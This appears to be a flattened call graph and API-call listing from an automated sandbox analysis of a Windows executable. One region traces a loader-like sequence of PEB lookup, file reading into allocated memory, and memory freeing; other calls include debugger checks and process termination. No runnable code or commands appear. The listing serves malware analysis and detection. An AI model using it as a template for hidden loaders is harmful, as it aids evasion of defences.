105273 937b2e 59 API calls 105269->105273 105270 96e4c8 105304 936d0c Mailbox 105270->105304 105276 96e4ac 105272->105276 105277 96e4cd 105272->105277 105274 936ba9 SetCurrentDirectoryW 105273->105274 105282 936bbc Mailbox 105274->105282 105275->105248 105275->105249 105279 934e4a 84 API calls 105276->105279 105278 934e4a 84 API calls 105277->105278 105280 96e4d2 105278->105280 105279->105264 105281 950db6 Mailbox 59 API calls 105280->105281 105288 96e506 105281->105288 105284 950db6 Mailbox 59 API calls 105282->105284 105286 936bcf 105284->105286 105285 933bbb 105285->104162 105285->104171 105287 93522e 59 API calls 105286->105287 105315 936bda Mailbox __wsetenvp 105287->105315 105289 93750f 59 API calls 105288->105289 105323 96e54f Mailbox 105289->105323 105290 936ce7 105408 935c6f 105290->105408 105293 96e740 105419 9972df 59 API calls Mailbox 105293->105419 105294 936cf3 SetCurrentDirectoryW 105294->105304 105297 96e762 105420 9afbce 59 API calls 2 library calls 105297->105420 105300 96e76f 105302 952d55 _free 58 API calls 105300->105302 105301 96e7d9 105423 98f7a1 89 API calls 4 library calls 105301->105423 105302->105304 105340 9357d4 105304->105340 105306 93750f 59 API calls 105306->105323 105307 96e7f2 105307->105290 105309 96e7d1 105422 98f5f7 59 API calls 4 library calls 105309->105422 105312 937de1 59 API calls 105312->105315 105315->105290 105315->105301 105315->105309 105315->105312 105401 93586d 67 API calls _wcscpy 105315->105401 105402 936f5d GetStringTypeW 105315->105402 105403 936ecc 60 API calls __wcsnicmp 105315->105403 105404 936faa GetStringTypeW __wsetenvp 105315->105404 105405 95363d GetStringTypeW _iswctype 105315->105405 105406 9368dc 165 API calls 3 library calls 105315->105406 105407 937213 59 API calls Mailbox 105315->105407 105316 937de1 59 API calls 105316->105323 105320 96e792 105421 98f7a1 89 API calls 4 library calls 105320->105421 105322 96e7ab 105324 952d55 _free 58 API calls 105322->105324 105323->105293 105323->105306 105323->105316 105323->105320 105415 98f73d 59 API calls 2 library calls 105323->105415 105416 98f65e 61 API calls 2 library calls 105323->105416 105417 99737f 59 API calls Mailbox 105323->105417 105418 937213 59 API calls Mailbox 105323->105418 105325 96e7be 105324->105325 105325->105304 105327 9375af 105326->105327 105330 937522 _memmove 105326->105330 105329 950db6 Mailbox 59 API calls 105327->105329 105328 950db6 Mailbox 59 API calls 105331 937529 105328->105331 105329->105330 105330->105328 105332 950db6 Mailbox 59 API calls 105331->105332 105333 937552 105331->105333 105332->105333 105333->105208 105334->105200 105335->105208 105336->105208 105337->105208 105338->105208 105339->105206 105341 935c6f CloseHandle 105340->105341 105342 9357dc Mailbox 105341->105342 105343 935c6f CloseHandle 105342->105343 105344 9357eb 105343->105344 105344->105285 105345->105238 105346->105241 105347->105250 105348->105267 105349->105275 105351 937667 59 API calls 105350->105351 105352 9345b1 105351->105352 105353 937667 59 API calls 105352->105353 105354 9345b9 105353->105354 105355 937667 59 API calls 105354->105355 105356 9345c1 105355->105356 105357 937667 59 API calls 105356->105357 105358 9345c9 105357->105358 105359 96d4d2 105358->105359 105360 9345fd 105358->105360 105361 938047 59 API calls 105359->105361 105362 93784b 59 API calls 105360->105362 105363 96d4db 105361->105363 105364 93460b 105362->105364 105365 937d8c 59 API calls 105363->105365 105366 937d2c 59 API calls 105364->105366 105368 934640 105365->105368 105367 934615 105366->105367 105367->105368 105369 93784b 59 API calls 105367->105369 105370 934680 105368->105370 105371 93465f 105368->105371 105383 96d4fb 105368->105383 105372 934636 105369->105372 105424 93784b 105370->105424 105377 9379f2 59 API calls 105371->105377 105376 937d2c 59 API calls 105372->105376 105374 934691 105378 9346a3 105374->105378 105381 938047 59 API calls 105374->105381 105375 96d5cb 105379 937bcc 59 API calls 105375->105379 105376->105368 105380 934669 105377->105380 105382 9346b3 105378->105382 105384 938047 59 API calls 105378->105384 105396 96d588 105379->105396 105380->105370 105387 93784b 59 API calls 105380->105387 105381->105378 105386 9346ba 105382->105386 105388 938047 59 API calls 105382->105388 105383->105375 105385 96d5b4 105383->105385 105398 96d532 105383->105398 105384->105382 105385->105375 105392 96d59f 105385->105392 105389 938047 59 API calls 105386->105389 105390 9346c1 Mailbox 105386->105390 105387->105370 105388->105386 105389->105390 105390->105269 105391 9379f2 59 API calls 105391->105396 105395 937bcc 59 API calls 105392->105395 105393 96d590 105394 937bcc 59 API calls 105393->105394 105394->105396 105395->105396 105396->105370 105396->105391 105437 937924 59 API calls 2 library calls 105396->105437 105398->105393 105399 96d57b 105398->105399 105400 937bcc 59 API calls 105399->105400 105400->105396 105401->105315 105402->105315 105403->105315 105404->105315 105405->105315 105406->105315 105407->105315 105409 935c79 105408->105409 105410 935c88 105408->105410 105409->105294 105410->105409 105411 935c8d CloseHandle 105410->105411 105411->105409 105412->105239 105413->105244 105414->105270 105415->105323 105416->105323 105417->105323 105418->105323 105419->105297 105420->105300 105421->105322 105422->105301 105423->105307 105425 9378b7 105424->105425 105426 93785a 105424->105426 105427 937d2c 59 API calls 105425->105427 105426->105425 105428 937865 105426->105428 105434 937888 _memmove 105427->105434 105429 937880 105428->105429 105430 96eb09 105428->105430 105438 937f27 59 API calls Mailbox 105429->105438 105431 938029 59 API calls 105430->105431 105433 96eb13 105431->105433 105435 950db6 Mailbox 59 API calls 105433->105435 105434->105374 105436 96eb33 105435->105436 105437->105396 105438->105434 105440 936d95 105439->105440 105441 936ea9 105439->105441 105440->105441 105442 950db6 Mailbox 59 API calls 105440->105442 105441->104314 105444 936dbc 105442->105444 105443 950db6 Mailbox 59 API calls 105445 936e31 105443->105445 105444->105443 105445->105441 105449 93750f 59 API calls 105445->105449 105452 936240 105445->105452 105477 93735d 59 API calls Mailbox 105445->105477 105478 986553 59 API calls Mailbox 105445->105478 105449->105445 105450->104317 105451->104319 105453 937a16 59 API calls 105452->105453 105470 936265 105453->105470 105454 93646a 105455 93750f 59 API calls 105454->105455 105456 936484 Mailbox 105455->105456 105456->105445 105459 96dff6 105483 98f8aa 91 API calls 4 library calls 105459->105483 105460 93750f 59 API calls 105460->105470 105464 937d8c 59 API calls 105464->105470 105465 96e004 105466 93750f 59 API calls 105465->105466 105468 96e01a 105466->105468 105467 936799 _memmove 105484 98f8aa 91 API calls 4 library calls 105467->105484 105468->105456 105469 96df92 105471 938029 59 API calls 105469->105471 105470->105454 105470->105459 105470->105460 105470->105464 105470->105467 105470->105469 105474 937e4f 59 API calls 105470->105474 105479 935f6c 60 API calls 105470->105479 105480 935d41 59 API calls Mailbox 105470->105480 105481 935e72 60 API calls 105470->105481 105482 937924 59 API calls 2 library calls 105470->105482 105473 96df9d 105471->105473 105476 950db6 Mailbox 59 API calls 105473->105476 105475 93643b CharUpperBuffW 105474->105475 105475->105470 105476->105467 105477->105445 105478->105445 105479->105470 105480->105470 105481->105470 105482->105470 105483->105465 105484->105456 105485->104332 105486->104333 105488 93e6d5 105487->105488 105489 973aa9 105488->105489 105492 93e73f 105488->105492 105501 93e799 105488->105501 105671 939ea0 105489->105671 105491 973abe 105517 93e970 Mailbox 105491->105517 105695 999e4a 89 API calls 4 library calls 105491->105695 105495 937667 59 API calls 105492->105495 105492->105501 105493 937667 59 API calls 105493->105501 105496 973b04 105495->105496 105499 952d40 __cinit 67 API calls 105496->105499 105497 952d40 __cinit 67 API calls 105497->105501 105498 973b26 105498->104379 105499->105501 105500 9384c0 69 API calls 105500->105517 105501->105493 105501->105497 105501->105498 105502 93e95a 105501->105502 105501->105517 105502->105517 105696 999e4a 89 API calls 4 library calls 105502->105696 105503 999e4a 89 API calls 105503->105517 105505 939ea0 331 API calls 105505->105517 105506 938d40 59 API calls 105506->105517 105507 939c90 Mailbox 59 API calls 105507->105517 105514 93f195 105700 999e4a 89 API calls 4 library calls 105514->105700 105515 973e25 105515->104379 105516 93ea78 105516->104379 105517->105500 105517->105503 105517->105505 105517->105506 105517->105507 105517->105514 105517->105516 105670 937f77 59 API calls 2 library calls 105517->105670 105697 986e8f 59 API calls 105517->105697 105698 9ac5c3 331 API calls 105517->105698 105699 9ab53c 331 API calls Mailbox 105517->105699 105701 9a93c6 331 API calls Mailbox 105517->105701 105519 93f650 105518->105519 105520 93f4ba 105518->105520 105523 937de1 59 API calls 105519->105523 105521 93f4c6 105520->105521 105522 97441e 105520->105522 105820 93f290 331 API calls 2 library calls 105521->105820 105821 9abc6b 105522->105821 105529 93f58c Mailbox 105523->105529 105526 97442c 105530 93f630 105526->105530 105861 999e4a 89 API calls 4 library calls 105526->105861 105528 93f4fd 105528->105526 105528->105529 105528->105530 105535 934e4a 84 API calls 105529->105535 105728 993c37 105529->105728 105731 99cb7a 105529->105731 105811 9a445a 105529->105811 105530->104379 105531 939c90 Mailbox 59 API calls 105532 93f5e3 105531->105532 105532->105530 105532->105531 105535->105532 105538 933212 105537->105538 105540 9331e0 105537->105540 105538->104379 105539 933205 IsDialogMessageW 105539->105538 105539->105540 105540->105538 105540->105539 105541 96cf32 GetClassLongW 105540->105541 105541->105539 105541->105540 105542->104379 106027 938180 105543->106027 105545 93fd3d 105546 97472d 105545->105546 105592 9406f6 105545->105592 106032 93f234 105545->106032 106046 999e4a 89 API calls 4 library calls 105546->106046 105550 974742 105586 93fdd3 105586->105550 106045 999e4a 89 API calls 4 library calls 105592->106045 105623->104340 105624->104345 105625->104379 105626->104347 105627->104347 105628->104347 105629->104379 105630->104379 105631->104379 105633 939851 105632->105633 105642 93984b 105632->105642 105634 939899 105633->105634 105635 96f4da 105633->105635 105636 96f5d3 __i64tow 105633->105636 105638 939857 __itow 105633->105638 106070 953698 83 API calls 3 library calls 105634->106070 105644 950db6 Mailbox 59 API calls 105635->105644 105649 96f552 Mailbox _wcscpy 105635->105649 105636->105636 105640 950db6 Mailbox 59 API calls 105638->105640 105641 939871 105640->105641 105641->105642 105643 937de1 59 API calls 105641->105643 105642->104379 105643->105642 105645 96f51f 105644->105645 105646 950db6 Mailbox 59 API calls 105645->105646 105647 96f545 105646->105647 105648 937de1 59 API calls 105647->105648 105647->105649 105648->105649 106071 953698 83 API calls 3 library calls 105649->106071 105650->104379 105651->104379 105653 96eda1 105652->105653 105656 9382f2 105652->105656 105654 96edb1 105653->105654 106072 9861a4 59 API calls 105653->106072 105657 93831c 105656->105657 105658 9385c0 59 API calls 105656->105658 105662 938339 Mailbox 105656->105662 105659 938322 105657->105659 105660 9385c0 59 API calls 105657->105660 105658->105657 105661 939c90 Mailbox 59 API calls 105659->105661 105659->105662 105660->105659 105661->105662 105662->104379 105663->104390 105664->104390 105665->104390 105666->104390 105667->104390 105668->104390 105669->104390 105670->105517 105672 939ebf 105671->105672 105690 939eed Mailbox 105671->105690 105673 950db6 Mailbox 59 API calls 105672->105673 105673->105690 105674 93b475 105675 938047 59 API calls 105674->105675 105689 93a057 105675->105689 105676 93b47a 105677 970055 105676->105677 105694 9709e5 105676->105694 105719 999e4a 89 API calls 4 library calls 105677->105719 105678 937667 59 API calls 105678->105690 105682 970064 105682->105491 105683 950db6 59 API calls Mailbox 105683->105690 105685 938047 59 API calls 105685->105690 105687 986e8f 59 API calls 105687->105690 105688 952d40 67 API calls __cinit 105688->105690 105689->105491 105690->105674 105690->105676 105690->105677 105690->105678 105690->105683 105690->105685 105690->105687 105690->105688 105690->105689 105691 9709d6 105690->105691 105693 93a55a 105690->105693 105702 93b900 105690->105702 105718 93c8c0 331 API calls 2 library calls 105690->105718 105721 999e4a 89 API calls 4 library calls 105691->105721 105720 999e4a 89 API calls 4 library calls 105693->105720 105722 999e4a 89 API calls 4 library calls 105694->105722 105695->105517 105696->105517 105697->105517 105698->105517 105699->105517 105700->105515 105701->105517 105703 93b91a 105702->105703 105706 93bac7 105702->105706 105704 93bf81 105703->105704 105703->105706 105707 93b9fc 105703->105707 105708 93baab 105703->105708 105704->105708 105706->105704 105706->105708 105709 93bb46 105706->105709 105716 93ba8b Mailbox 105706->105716 105707->105708 105707->105709 105708->105690 105708->105708 105709->105708 105709->105716 105716->105690 105716->105708 105718->105690 105719->105682 105720->105689 105721->105694 105722->105689 105862 99445a GetFileAttributesW 105728->105862 105732 937667 59 API calls 105731->105732 105733 99cbaf 105732->105733 105734 937667 59 API calls 105733->105734 105735 99cbb8 105734->105735 105812 939837 84 API calls 105811->105812 105813 9a4494 105812->105813 105814 936240 94 API calls 105813->105814 105820->105528 105822 9abcb0 105821->105822 105823 9abc96 105821->105823 106020 9aa213 59 API calls Mailbox 105822->106020 106019 999e4a 89 API calls 4 library calls 105823->106019 105826 9abcbb 105827 939ea0 330 API calls 105826->105827 105828 9abd1c 105827->105828 105854 9abca8 Mailbox 105828->105854 105854->105526 105861->105530 105863 994475 FindFirstFileW 105862->105863 105865 993c3e 105862->105865 105864 99448a FindClose 105863->105864 105863->105865 105864->105865 105865->105532 106019->105854 106020->105826 106028 93818f 106027->106028 106031 9381aa 106027->106031 106029 937e4f 59 API calls 106028->106029 106030 938197 CharUpperBuffW 106029->106030 106030->106031 106031->105545 106033 93f251 106032->106033 106034 93f272 106033->106034 106068 999e4a 89 API calls 4 library calls 106033->106068 106034->105586 106045->105546 106046->105550 106068->106034 106070->105638 106071->105636 106072->105654 106073 931016 106078 934974 106073->106078 106076 952d40 __cinit 67 API calls 106077 931025 106076->106077 106079 950db6 Mailbox 59 API calls 106078->106079 106080 93497c 106079->106080 106081 93101b 106080->106081 106085 934936 106080->106085 106081->106076 106086 934951 106085->106086 106087 93493f 106085->106087 106089 9349a0 106086->106089 106088 952d40 __cinit 67 API calls 106087->106088 106088->106086 106090 937667 59 API calls 106089->106090 106091 9349b8 GetVersionExW 106090->106091 106092 937bcc 59 API calls 106091->106092 106093 9349fb 106092->106093 106094 937d2c 59 API calls 106093->106094 106101 934a28 106093->106101 106095 934a1c 106094->106095 106096 937726 59 API calls 106095->106096 106096->106101 106097 934a93 GetCurrentProcess IsWow64Process 106098 934aac 106097->106098 106099 934ac2 106098->106099 106100 934b2b GetSystemInfo 106098->106100 106113 934b37 106099->106113 106104 934af8 106100->106104 106101->106097 106102 96d864 106101->106102 106104->106081 106106 934ad4 106108 934b37 2 API calls 106106->106108 106107 934b1f GetSystemInfo 106109 934ae9 106107->106109 106110 934adc GetNativeSystemInfo 106108->106110 106109->106104 106111 934aef FreeLibrary 106109->106111 106110->106109 106111->106104 106114 934ad0 106113->106114 106115 934b40 LoadLibraryA 106113->106115 106114->106106 106114->106107 106115->106114 106116 934b51 GetProcAddress 106115->106116 106116->106114 106117 10d89c8 106131 10d6618 106117->106131 106119 10d8a72 106135 10d88b8 106119->106135 106132 10d6657 106131->106132 106138 10d9a98 GetPEB 106132->106138 106134 10d6ca3 106134->106119 106136 10d88c1 Sleep 106135->106136 106137 10d88cf 106136->106137 106139 10d9ac2 106138->106139 106139->106134 106140 931055 106145 932649 106140->106145 106143 952d40 __cinit 67 API calls 106144 931064 106143->106144 106146 937667 59 API calls 106145->106146 106147 9326b7 106146->106147 106152 933582 106147->106152 106149 932754 106151 93105a 106149->106151 106155 933416 59 API calls 2 library calls 106149->106155 106151->106143 106156 9335b0 106152->106156 106155->106149 106157 9335bd 106156->106157 106158 9335a1 106156->106158 106157->106158 106159 9335c4 RegOpenKeyExW 106157->106159 106158->106149 106159->106158 106160 9335de RegQueryValueExW 106159->106160 106161 933614 RegCloseKey 106160->106161 106162 9335ff 106160->106162 106161->106158 106162->106161 106163 93be19 106164 93be22 106163->106164 106177 93baab 106163->106177 106165 939837 84 API calls 106164->106165 106173 93ba8b Mailbox 106164->106173 106164->106177 106166 93be4d 106165->106166 106167 97107b 106166->106167 106168 93be5d 106166->106168 106178 987bdb 59 API calls _memmove 106167->106178 106169 937a51 59 API calls 106168->106169 106169->106173 106171 971085 106172 938047 59 API calls 106171->106172 106172->106173 106175 971361 106173->106175 106173->106177 106180 938cd4 59 API calls Mailbox 106173->106180 106175->106177 106179 953d46 59 API calls __wtof_l 106175->106179 106178->106171 106179->106177 106180->106173 106181 96fdfc 106185 93ab30 Mailbox _memmove 106181->106185 106183 98617e Mailbox 59 API calls 106202 93a057 106183->106202 106184 939c90 Mailbox 59 API calls 106184->106185 106185->106184 106185->106202 106204 937de1 59 API calls 106185->106204 106207 939f37 Mailbox 106185->106207 106211 9abc6b 331 API calls 106185->106211 106213 93b2b6 106185->106213 106215 939ea0 331 API calls 106185->106215 106216 97086a 106185->106216 106218 970878 106185->106218 106220 97085c 106185->106220 106221 93b21c 106185->106221 106223 950db6 59 API calls Mailbox 106185->106223 106226 93b525 106185->106226 106227 986e8f 59 API calls 106185->106227 106230 9adf37 106185->106230 106233 9adf23 106185->106233 106236 9ac2e0 106185->106236 106268 997956 106185->106268 106274 98617e 106185->106274 106279 9ac193 85 API calls 2 library calls 106185->106279 106188 970055 106280 999e4a 89 API calls 4 library calls 106188->106280 106190 950db6 59 API calls Mailbox 106190->106207 106191 93b900 60 API calls 106191->106207 106192 93b475 106195 938047 59 API calls 106192->106195 106194 970064 106195->106202 106198 93b47a 106198->106188 106209 9709e5 106198->106209 106199 937667 59 API calls 106199->106207 106201 938047 59 API calls 106201->106207 106203 986e8f 59 API calls 106203->106207 106204->106185 106205 9709d6 106284 999e4a 89 API calls 4 library calls 106205->106284 106206 952d40 67 API calls __cinit 106206->106207 106207->106188 106207->106190 106207->106191 106207->106192 106207->106198 106207->106199 106207->106201 106207->106202 106207->106203 106207->106205 106207->106206 106210 93a55a 106207->106210 106277 93c8c0 331 API calls 2 library calls 106207->106277 106285 999e4a 89 API calls 4 library calls 106209->106285 106283 999e4a 89 API calls 4 library calls 106210->106283 106211->106185 106278 93f6a3 331 API calls 106213->106278 106215->106185 106217 939c90 Mailbox 59 API calls 106216->106217 106217->106220 106282 999e4a 89 API calls 4 library calls 106218->106282 106220->106183 106220->106202 106222 939d3c 60 API calls 106221->106222 106224 93b22d 106222->106224 106223->106185 106225 939d3c 60 API calls 106224->106225 106225->106213 106281 999e4a 89 API calls 4 library calls 106226->106281 106227->106185 106286 9acadd 106230->106286 106232 9adf47 106232->106185 106234 9acadd 130 API calls 106233->106234 106235 9adf33 106234->106235 106235->106185 106237 937667 59 API calls 106236->106237 106238 9ac2f4 106237->106238 106239 937667 59 API calls 106238->106239 106240 9ac2fc 106239->106240 106241 937667 59 API calls 106240->106241 106242 9ac304 106241->106242 106243 939837 84 API calls 106242->106243 106267 9ac312 106243->106267 106244 937bcc 59 API calls 106244->106267 106245 9ac4fb 106246 9ac528 Mailbox 106245->106246 106377 939a3c 59 API calls Mailbox 106245->106377 106246->106185 106248 9ac4e2 106250 937cab 59 API calls 106248->106250 106249 9ac4fd 106254 937cab 59 API calls 106249->106254 106253 9ac4ef 106250->106253 106251 937924 59 API calls 106251->106267 106252 938047 59 API calls 106252->106267 106256 937b2e 59 API calls 106253->106256 106257 9ac50c 106254->106257 106255 937e4f 59 API calls 106260 9ac3a9 CharUpperBuffW 106255->106260 106256->106245 106258 937b2e 59 API calls 106257->106258 106258->106245 106259 937e4f 59 API calls 106261 9ac469 CharUpperBuffW 106259->106261 106375 93843a 68 API calls 106260->106375 106376 93c5a7 69 API calls 2 library calls 106261->106376 106264 939837 84 API calls 106264->106267 106265 937cab 59 API calls 106265->106267 106266 937b2e 59 API calls 106266->106267 106267->106244 106267->106245 106267->106246 106267->106248 106267->106249 106267->106251 106267->106252 106267->106255 106267->106259 106267->106264 106267->106265 106267->106266 106269 997962 106268->106269 106270 950db6 Mailbox 59 API calls 106269->106270 106272 997970 106270->106272 106271 99797e 106271->106185 106272->106271 106273 937667 59 API calls 106272->106273 106273->106271 106378 9860c0 106274->106378 106276 98618c 106276->106185 106277->106207 106278->106226 106279->106185 106280->106194 106281->106220 106282->106220 106283->106202 106284->106209 106285->106202 106287 939837 84 API calls 106286->106287 106288 9acb1a 106287->106288 106307 9acb61 Mailbox 106288->106307 106324 9ad7a5 106288->106324 106290 9acdb9 106291 9acf2e 106290->106291 106296 9acdc7 106290->106296 106362 9ad8c8 92 API calls Mailbox 106291->106362 106294 9acf3d 106294->106296 106297 9acf49 106294->106297 106295 939837 84 API calls 106314 9acbb2 Mailbox 106295->106314 106337 9ac96e 106296->106337 106297->106307 106302 9ace00 106352 950c08 106302->106352 106305 9ace1a 106358 999e4a 89 API calls 4 library calls 106305->106358 106306 9ace33 106309 9392ce 59 API calls 106306->106309 106307->106232 106311 9ace3f 106309->106311 106310 9ace25 GetCurrentProcess TerminateProcess 106310->106306 106312 939050 59 API calls 106311->106312 106313 9ace55 106312->106313 106323 9ace7c 106313->106323 106359 938d40 59 API calls Mailbox 106313->106359 106314->106290 106314->106295 106314->106307 106356 9afbce 59 API calls 2 library calls 106314->106356 106357 9acfdf 61 API calls 2 library calls 106314->106357 106315 9acfa4 106315->106307 106320 9acfb8 FreeLibrary 106315->106320 106317 9ace6b 106360 9ad649 107 API calls _free 106317->106360 106320->106307 106322 939d3c 60 API calls 106322->106323 106323->106315 106323->106322 106361 938d40 59 API calls Mailbox 106323->106361 106363 9ad649 107 API calls _free 106323->106363 106325 937e4f 59 API calls 106324->106325 106326 9ad7c0 CharLowerBuffW 106325->106326 106364 98f167 106326->106364 106330 937667 59 API calls 106331 9ad7f9 106330->106331 106332 93784b 59 API calls 106331->106332 106334 9ad810 106332->106334 106333 9ad858 Mailbox 106333->106314 106335 937d2c 59 API calls 106334->106335 106336 9ad81c Mailbox 106335->106336 106336->106333 106371 9acfdf 61 API calls 2 library calls 106336->106371 106338 9ac989 106337->106338 106342 9ac9de 106337->106342 106339 950db6 Mailbox 59 API calls 106338->106339 106340 9ac9ab 106339->106340 106341 950db6 Mailbox 59 API calls 106340->106341 106340->106342 106341->106340 106343 9ada50 106342->106343 106344 9adc79 Mailbox 106343->106344 106351 9ada73 _strcat _wcscpy __wsetenvp 106343->106351 106344->106302 106345 939b3c 59 API calls 106345->106351 106346 939be6 59 API calls 106346->106351 106347 939b98 59 API calls 106347->106351 106348 939837 84 API calls 106348->106351 106349 95571c 58 API calls __malloc_crt 106349->106351 106351->106344 106351->106345 106351->106346 106351->106347 106351->106348 106351->106349 106374 995887 61 API calls 2 library calls 106351->106374 106354 950c1d 106352->106354 106353 950cb5 VirtualProtect 106355 950c83 106353->106355 106354->106353 106354->106355 106355->106305 106355->106306 106356->106314 106357->106314 106358->106310 106359->106317 106360->106323 106361->106323 106362->106294 106363->106323 106365 98f192 __wsetenvp 106364->106365 106366 98f1d1 106365->106366 106369 98f1c7 106365->106369 106370 98f278 106365->106370 106366->106330 106366->106336 106369->106366 106372 9378c4 61 API calls 106369->106372 106370->106366 106373 9378c4 61 API calls 106370->106373 106371->106333 106372->106369 106373->106370 106374->106351 106375->106267 106376->106267 106377->106246 106379 9860e8 106378->106379 106380 9860cb 106378->106380 106379->106276 106380->106379 106382 9860ab 59 API calls Mailbox 106380->106382 106382->106380 106383 93107d 106388 93708b 106383->106388 106385 93108c 106386 952d40 __cinit 67 API calls 106385->106386 106387 931096 106386->106387 106389 93709b __write_nolock 106388->106389 106390 937667 59 API calls 106389->106390 106391 937151 106390->106391 106392 934706 61 API calls 106391->106392 106393 93715a 106392->106393 106419 95050b 106393->106419 106396 937cab 59 API calls 106397 937173 106396->106397 106398 933f74 59 API calls 106397->106398 106399 937182 106398->106399 106400 937667 59 API calls 106399->106400 106401 93718b 106400->106401 106402 937d8c 59 API calls 106401->106402 106403 937194 RegOpenKeyExW 106402->106403 106404 96e8b1 RegQueryValueExW 106403->106404 106409 9371b6 Mailbox 106403->106409 106405 96e943 RegCloseKey 106404->106405 106406 96e8ce 106404->106406 106407 96e955 _wcscat Mailbox __wsetenvp 106405->106407 106405->106409 106408 950db6 Mailbox 59 API calls 106406->106408 106407->106409 106411 9379f2 59 API calls 106407->106411 106417 937de1 59 API calls 106407->106417 106418 933f74 59 API calls 106407->106418 106410 96e8e7 106408->106410 106409->106385 106412 93522e 59 API calls 106410->106412 106411->106407 106413 96e8f2 RegQueryValueExW 106412->106413 106414 96e90f 106413->106414 106416 96e929 106413->106416 106415 937bcc 59 API calls 106414->106415 106415->106416 106416->106405 106417->106407 106418->106407 106420 961940 __write_nolock 106419->106420 106421 950518 GetFullPathNameW 106420->106421 106422 95053a 106421->106422 106423 937bcc 59 API calls 106422->106423 106424 937165 106423->106424 106424->106396 106425 96fe27 106438 94f944 106425->106438 106427 96fe3d 106428 96fe53 106427->106428 106429 96febe 106427->106429 106447 939e5d 60 API calls 106428->106447 106434 93fce0 331 API calls 106429->106434 106431 96fe92 106432 97089c 106431->106432 106433 96fe9a 106431->106433 106449 999e4a 89 API calls 4 library calls 106432->106449 106448 99834f 59 API calls Mailbox 106433->106448 106437 96feb2 Mailbox 106434->106437 106437->106437 106439 94f950 106438->106439 106440 94f962 106438->106440 106441 939d3c 60 API calls 106439->106441 106442 94f991 106440->106442 106443 94f968 106440->106443 106446 94f95a 106441->106446 106444 939d3c 60 API calls 106442->106444 106445 950db6 Mailbox 59 API calls 106443->106445 106444->106446 106445->106446 106446->106427 106447->106431 106448->106437 106449->106437 106450 998d0d 106451 998d1a 106450->106451 106456 998d20 106450->106456 106452 952d55 _free 58 API calls 106451->106452 106452->106456 106453 952d55 _free 58 API calls 106454 998d31 106453->106454 106455 998d43 106454->106455 106457 952d55 _free 58 API calls 106454->106457 106456->106453 106456->106454 106457->106455 106458 931066 106463 93f76f 106458->106463 106460 93106c 106461 952d40 __cinit 67 API calls 106460->106461 106462 931076 106461->106462 106464 93f790 106463->106464 106496 94ff03 106464->106496 106468 93f7d7 106469 937667 59 API calls 106468->106469 106470 93f7e1 106469->106470 106471 937667 59 API calls 106470->106471 106472 93f7eb 106471->106472 106473 937667 59 API calls 106472->106473 106474 93f7f5 106473->106474 106475 937667 59 API calls 106474->106475 106476 93f833 106475->106476 106477 937667 59 API calls 106476->106477 106478 93f8fe 106477->106478 106506 945f87 106478->106506 106482 93f930 106483 937667 59 API calls 106482->106483 106484 93f93a 106483->106484 106534 94fd9e 106484->106534 106486 93f981 106487 93f991 GetStdHandle 106486->106487 106488 9745ab 106487->106488 106489 93f9dd 106487->106489 106488->106489 106490 9745b4 106488->106490 106491 93f9e5 OleInitialize 106489->106491 106541 996b38 64 API calls Mailbox 106490->106541 106491->106460 106493 9745bb 106542 997207 CreateThread 106493->106542 106495 9745c7 CloseHandle 106495->106491 106543 94ffdc 106496->106543 106499 94ffdc 59 API calls 106500 94ff45 106499->106500 106501 937667 59 API calls 106500->106501 106502 94ff51 106501->106502 106503 937bcc 59 API calls 106502->106503 106504 93f796 106503->106504 106505 950162 6 API calls 106504->106505 106505->106468 106507 937667 59 API calls 106506->106507 106508 945f97 106507->106508 106509 937667 59 API calls 106508->106509 106510 945f9f 106509->106510 106550 945a9d 106510->106550 106513 945a9d 59 API calls 106514 945faf 106513->106514 106515 937667 59 API calls 106514->106515 106516 945fba 106515->106516 106517 950db6 Mailbox 59 API calls 106516->106517 106518 93f908 106517->106518 106519 9460f9 106518->106519 106520 946107 106519->106520 106521 937667 59 API calls 106520->106521 106522 946112 106521->106522 106523 937667 59 API calls 106522->106523 106524 94611d 106523->106524 106525 937667 59 API calls 106524->106525 106526 946128 106525->106526 106527 937667 59 API calls 106526->106527 106528 946133 106527->106528 106529 945a9d 59 API calls 106528->106529 106530 94613e 106529->106530 106531 950db6 Mailbox 59 API calls 106530->106531 106532 946145 RegisterWindowMessageW 106531->106532 106532->106482 106535 98576f 106534->106535 106536 94fdae 106534->106536 106553 999ae7 60 API calls 106535->106553 106538 950db6 Mailbox 59 API calls 106536->106538 106540 94fdb6 106538->106540 106539 98577a 106540->106486 106541->106493 106542->106495 106554 9971ed 65 API calls 106542->106554 106544 937667 59 API calls 106543->106544 106545 94ffe7 106544->106545 106546 937667 59 API calls 106545->106546 106547 94ffef 106546->106547 106548 937667 59 API calls 106547->106548 106549 94ff3b 106548->106549 106549->106499 106551 937667 59 API calls 106550->106551 106552 945aa5 106551->106552 106552->106513 106553->106539 106555 97416f 106559 985fe6 106555->106559 106557 97417a 106558 985fe6 85 API calls 106557->106558 106558->106557 106560 985ff3 106559->106560 106569 986020 106559->106569 106561 986022 106560->106561 106563 986027 106560->106563 106567 98601a 106560->106567 106560->106569 106571 939328 84 API calls Mailbox 106561->106571 106564 939837 84 API calls 106563->106564 106565 98602e 106564->106565 106566 937b2e 59 API calls 106565->106566 106566->106569 106570 9395a0 59 API calls _wcsstr 106567->106570 106569->106557 106570->106569 106571->106563 106572 10d8f73 106575 10d8be8 106572->106575 106574 10d8fbf 106576 10d6618 GetPEB 106575->106576 106585 10d8c87 106576->106585 106578 10d8cb8 CreateFileW 106581 10d8cc5 106578->106581 106578->106585 106579 10d8ce1 VirtualAlloc 106580 10d8d02 ReadFile 106579->106580 106579->106581 106580->106581 106584 10d8d20 VirtualAlloc 106580->106584 106582 10d8ed4 VirtualFree 106581->106582 106583 10d8ee2 106581->106583 106582->106583 106583->106574 106584->106581 106584->106585 106585->106579 106585->106581 106586 10d8de8 CloseHandle 106585->106586 106587 10d8df8 VirtualFree 106585->106587 106588 10d9af8 GetPEB 106585->106588 106586->106585 106587->106585 106589 10d9b22 106588->106589 106589->106578

                                                                Executed Functions

                                                                Function 00933B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00933B68
                                                                • IsDebuggerPresent.KERNEL32 ref: 00933B7A
                                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?,009F52F8,009F52E0,?,?), ref: 00933BEB
                                                                  • Part of subcall function 00937BCC: _memmove.LIBCMT ref: 00937C06
                                                                  • Part of subcall function 0094092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00933C14,009F52F8,?,?,?), ref: 0094096E
